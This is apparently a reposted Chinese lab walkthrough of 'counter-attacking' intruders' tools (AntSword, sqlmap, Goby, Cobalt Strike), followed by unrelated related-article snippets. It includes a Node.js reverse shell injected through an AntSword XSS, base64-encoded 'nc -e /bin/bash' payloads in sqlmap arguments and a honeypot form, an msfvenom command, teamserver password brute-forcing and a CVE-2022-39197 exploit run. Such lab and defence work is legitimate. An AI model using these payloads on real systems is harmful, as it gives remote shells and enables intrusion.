第170天:应急响应-战中溯源反制对抗上线CSGoby蚁剑Sqlmap等安全工具

news2024/11/23 20:07:41

目录

案例一:溯源反制-Webshell工具-Antsword

案例二:溯源反制-SQL注入工具-SQLMAP

案例三:溯源反制-漏洞扫描工具-Goby

案例四:溯源反制-远程控制工具-CobaltStrike

反制Server,爆破密码(通用)

CVE-2022-39197


案例一:溯源反制-Webshell工具-Antsword

参考文章:溯源(七)之利用AntSword RCE进行溯源反制黑客 - 私ははいしゃ敗者です - 博客园

有版本限制,这里我时蚁剑v2.0.7

攻击段上传php一句话木马建立连接

防守方目录中已经上传

 把对方的上传的文件改成下面的

<?php header('HTTP/1.1 500 <img src=# οnerrοr=alert(1)>');?>

 蚁剑再次连接的时候会弹出1

可以看出来蚁剑可以执行javascript代码,因为不在浏览器上所以应该可以执行node.js代码

Node.js是一个基于Google Chrome V8 JavaScript引擎的开源JavaScript运行时环境。它使得JavaScript能够在服务器端运行

node.js通过socket反弹shell

var net = require("net"), sh = require("child_process").exec("cmd.exe");
var client = new net.Socket();
client.connect(1111, "192.168.232.131", function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});

把ip修改为自己的ip和端口,并进行base64编码

利用xss漏洞触发执行,把编码进行拼接

<?php
 header("HTTP/1.1 500 Not \<img src=# onerror='eval(new Buffer(`dmFyIG5ldCA9IHJlcXVpcmUoIm5ldCIpLCBzaCA9IHJlcXVpcmUoImNoaWxkX3Byb2Nlc3MiKS5leGVjKCJjbWQuZXhlIik7CnZhciBjbGllbnQgPSBuZXcgbmV0LlNvY2tldCgpOwpjbGllbnQuY29ubmVjdCgxMTExLCAiMTkyLjE2OC4yMzIuMTMxIiwgZnVuY3Rpb24oKXtjbGllbnQucGlwZShzaC5zdGRpbik7c2guc3Rkb3V0LnBpcGUoY2xpZW50KTtzaC5zdGRlcnIucGlwZShjbGllbnQpO30pOw==`,`base64`).toString())'>");
 ?>

防守方修改

这里我新开了一台kali进行监听

 当攻击者再次访问的时候反弹shell

利用msf生成node.js木马,后续步骤与之前一致

msfvenom -p nodejs/shell_reverse_tcp LHOST=192.168.0.105 LPORT=10086 -f raw -o payload.js

案例二:溯源反制-SQL注入工具-SQLMAP

linux系统在运行命令时,在后面有参数的时候会先去看参数是什么,然后再执行,当加上

"`{命令}`"   的时候命令就会被执行

根据这个特性,在sqlmap执行命令加上参数

sqlmap -u "http://192.168.232.128/1.php?id=aaa&b=`ls`"

利用nc反弹shell

sqlmap -u "http://192.168.232.128/1.php?id=aaa&b=`nc -e /bin/bash 192.168.232.128 2222`" 

创建钓鱼页面,把echo后面的代码变成反弹自己页面的base64代码

<html>
<head>
    <meta charset="utf-8">  
    <title> A sqlmap honeypot demo</title>
</head>
<body>
	<input>search the user</input>   <!--创建一个空白表单-->
	<form action="username.html" method="post" enctype="text/plain">
		<!--创建一个隐藏的表单-->
		<input type='hidden' name='name' value="VertiFy&id=45273434&query=shell`echo bmMgLWUgL2Jpbi9zaCAxOTIuMTY4LjIzMi4xMjggMjIyMg== | base64 -d|bash -i`&port=6379"/>	
		<!--创建一个按钮,提交表单内容-->
		<input type="submit" value='提交'>
 
	</form>
</body>
</html>

 

利用漏洞扫描工具扫描的时候就会扫描到post类型的sql注入,最好配合正式系统,留个陷阱

访问然后抓包,发现为post

利用sqlmap进行注入的时候

成功反制

但是问题就是感觉有经验的一眼就能看出来,就能骗骗菜鸟,而且还需要优化,不能让他卡在那里

案例三:溯源反制-漏洞扫描工具-Goby

参考文章:蓝队反制之--Goby反制 - 小阿辉谈安全 - 博客园

扫描完发现能扫描出来,但是复现不出来

案例四:溯源反制-远程控制工具-CobaltStrike

反制Server,爆破密码(通用)

项目地址: https://github.com/ryanohoro/csbruter

命令,这里默认他是50050端口,一般需要去爆破出来cs开放端口是多少,并且确定了cs地址,如果他没有做过c2

python3 csbruter.py [-h] [-p PORT] [-t THREADS] host [wordlist]

python csbruter.py 192.168.232.131 pass.txt

能否爆破出来取决于密码字典

 可以直接根据目标ip以及密码连接到对方的cs,获取对方的成功!

CVE-2022-39197

cs <= 4.7

项目地址:GitHub - its-arun/CVE-2022-39197: CobaltStrike <= 4.7.1 RCE

配置项目

 生成完成以后

复制到serve目录下

在该目录下搭建简易网站

需要修改文件

执行命令

python cve-2022-39197.py beacon.exe http://python简易网站:8000/evil.svg

同时cs会上线

如果在这个中间看了进程会触发rce,会弹出计算器

 可惜没复现成功,后续就是把计算机命令改成反弹shell的命令

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2208327.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

吴恩达演讲全文:AI Agent工作流的趋势

本文是吴恩达今年3月的演讲&#xff0c;题目为“Agentic Reasoning”&#xff0c;对AI Agent工作流的趋势进行了讲解。 本文对AI Agent翻译为了AI代理。 吴恩达指出&#xff0c;随着AI技术的发展&#xff0c;AI代理被视为一个能显著提升软件开发效率和质量的工具。 他通过展…

umi配置阿里云短信验证登录流程

首先 开通短信服务&#xff0c;融合认证&#xff0c;设置签名&#xff0c;模板&#xff0c;templateparams&#xff0c;调试板块可以发送成功并测试&#xff1b; s​​​​​​​​​​​​​​SendSmsVerifyCode_云通信号码认证服务_API调试-阿里云OpenAPI开发者门户 下图的s…

荆州团市委领导一行赴点赋科技公司参观考察

近日&#xff0c;荆州团市委书记熊燃、副书记陈杰一行前往点赋科技公司进行参观考察&#xff0c;为荆州科技领域与青年工作的交流合作开启新篇。 在考察过程中&#xff0c;熊燃书记和陈杰副书记深入点赋科技公司的办公区域、设备点位等进行实地走访。他们仔细聆听了公司董事长崔…

HUAWEI_HCIA_实验指南_Lib3.1_VLAN 基础配置及 Access 接口

1、原理概述 早期的局域网技术是基于总线型结构的。总线型拓扑结构是由一根单电缆连接着所有主机&#xff0c;这种局域网技术存在着冲突域问题&#xff0c;即所有用户都在一个冲突域中&#xff0c;那么同一时间内只有一台主机能发送消息&#xff0c;从任意设备发出的消息都会被…

Monad 101 杭州线下活动:解锁创新技术,引领低成本高效 DApp 开发之路!

以太坊等区块链在处理传统金融大规模交易时面临巨大挑战&#xff0c;有限的可扩展性成为阻碍其广泛应用的主要瓶颈。为了解决这一难题&#xff0c;并缩小传统金融与去中心化金融&#xff08;DeFi&#xff09;之间的差距&#xff0c;Keone 创立了 Monad。通过显著提升交易速度和…

STM32(十八):SPI通信

SPI通信&#xff1a; SPI&#xff08;Serial Peripheral Interface&#xff09;是由Motorola公司开发的一种通用数据总线 四根通信线&#xff1a;SCK&#xff08;Serial Clock&#xff09;、MOSI&#xff08;Master Output Slave Input&#xff09;主机输出从机输入、MISO&…

Idea 2024.2.3 找不到Cache Recovery设置

idea找不到官网所说的设置 下面是解决办法 1.找到对应位置 2.增加配置文件内容 idea.is.internaltrue3.重启idea 4.查看结果 解决方案原文

Android列表组件api

目录 1.ListView控件 1&#xff09;android:divider 2&#xff09;android:dividerHeight 3&#xff09;android:entries 4&#xff09;android:footerDividersEnabled 5&#xff09;android:headerDividersEnabled 6&#xff09;android:listSelector 7&#xff09;android:sc…

JavaScript Set 必备指南:深入理解 Set 的特性和方法

一. 了解 Set 1. 概念和用途 Set 是 JavaScript 中的一种集合&#xff08;collection&#xff09;数据结构&#xff0c;它类似于数组&#xff0c;但是集合中的元素是唯一的&#xff0c;不允许重复。Set 提供了一种存储不重复数值或对象的机制&#xff0c;可以用于存储一组唯一…

【03】手把手教你0基础部署SpringCloud微服务商城教学-Docker前置篇(附Linux虚拟机配置调试及Docker安装全流程)

前文回顾&#xff1a;【02】手把手教你0基础部署SpringCloud微服务商城教学-Mybatis篇&#xff08;下&#xff09; 首先我们第一次看见这个东西&#xff0c;第一步就是需要知道它到底是用来干什么的&#xff1f; 简单来说&#xff0c;Docker就是一个快速构建、运行、管理应用的…

K8s-services+pod详解1

一、Service 我们能够利用Deployment创建一组Pod来提供具有高可用性的服务。 虽然每个Pod都会分配一个单独的Pod IP&#xff0c;然而却存在如下两问题&#xff1a; Pod IP 会随着Pod的重建产生变化Pod IP 仅仅是集群内可见的虚拟IP&#xff0c;外部无法访问 这样对于访问这…

【干货】2024新学期期中考试,老师成绩发布工具

老师们别再为期中发成绩发愁了&#xff0c;我给各位带来了一个解决方案——易查分小程序&#xff0c;它可以将彻底改变您发布成绩的方式&#xff01;一分钟发布期中考试成绩。不管您是教育界的新手还是老手&#xff0c;易查分都能成为您的得力助手。它的界面既美观又实用&#…

大数据毕业设计选题推荐-音乐数据分析系统-音乐推荐系统-Python数据可视化-Hive-Hadoop-Spark

✨作者主页&#xff1a;IT研究室✨ 个人简介&#xff1a;曾从事计算机专业培训教学&#xff0c;擅长Java、Python、微信小程序、Golang、安卓Android等项目实战。接项目定制开发、代码讲解、答辩教学、文档编写、降重等。 ☑文末获取源码☑ 精彩专栏推荐⬇⬇⬇ Java项目 Python…

一些近期值得关注的存储和备份潜在漏洞

时刻保持警惕&#xff0c;及时、适时地检测暴露于安全建议和警告的相关设备&#xff0c;这一点对企业数据安全再重要不过了。 Continuity调研指出了最近几个月&#xff0c;存储和备份解决方案中存在的、可被攻击者发现和利用的潜在漏洞&#xff0c;包括&#xff1a; Veeam Ba…

YOLOv10改进目录一览 | 涉及卷积层、轻量化、注意力、损失函数、Backbone、SPPF、Neck、检测头等全方位改进

必读内容&#x1f4d6; 如何寻找创新点&#xff1f;为什么要使用这个模块&#xff1f;如何才能提升模型的精度&#xff1f;这是贯穿我们研究始终的问题。创新点在这个专栏中我已经整理好了&#xff0c;这已经省去了大部分时间&#xff0c;但是当我们使用这些新的模块去优化已有…

LDR6500取电诱骗协议芯片:革新电子设备充电体验

在当今电子设备日新月异的时代&#xff0c;Type-C接口以其高效、便捷的特点迅速成为市场主流。这一接口不仅支持高速数据传输&#xff0c;还实现了正反插拔的便利性&#xff0c;极大地提升了用户体验。然而&#xff0c;在Type-C接口的广泛应用背后&#xff0c;一个关键的技术组…

Java日常开发小结-01

一、fastjson2 FastJson对于json格式字符串的解析主要用到三个类1.JSON&#xff1a;解析器&#xff0c;用于JSON格式字符串与JSON对象及javaBean之间的转换 2.JSONObject&#xff1a;json对象 3.JSONArray&#xff1a; json数组对象 1.1、引入依赖 <dependency><gr…

雷池社区版本SYSlog使用教程

雷池会对恶意攻击进行拦截&#xff0c;但是日志都在雷池机器上显示 如何把日志都同步到相关设备进行统一的管理和分析呢&#xff1f; 如需将雷池攻击日志实时同步到第三方服务器, 可使用雷池的 Syslog 外发 功能 启用 Syslog 外发 进入雷池 系统设置 页面, 配置 Syslog 设置…

基于单片机的公交车自动报站器设计

本设计是以STM32单片机为控制核心的公交车自动报站系统&#xff0c;该系统的主要构成模块有&#xff1a;控制核心模块、GPS模块、温度模块、语音模块、按键控制模块和显示模块。采用点阵显示屏&#xff0c;可自动显示下一站&#xff0c;使用OLED显示器显示温度和经纬度&#xf…

免费使用Cursor, 切换DeepSeek模型

1. 选择设置 直接点击右上角的齿轮图标 或 者通过文件-->首选项-->Cursor Settings 2. 添加模型 点击Models→Add model 添加模型→添加Deepseek的模型名称&#xff1a;deepseek-coder 和 deepseek-chat→注意&#xff1a;模型名一定不能输错&#xff01;&#xff…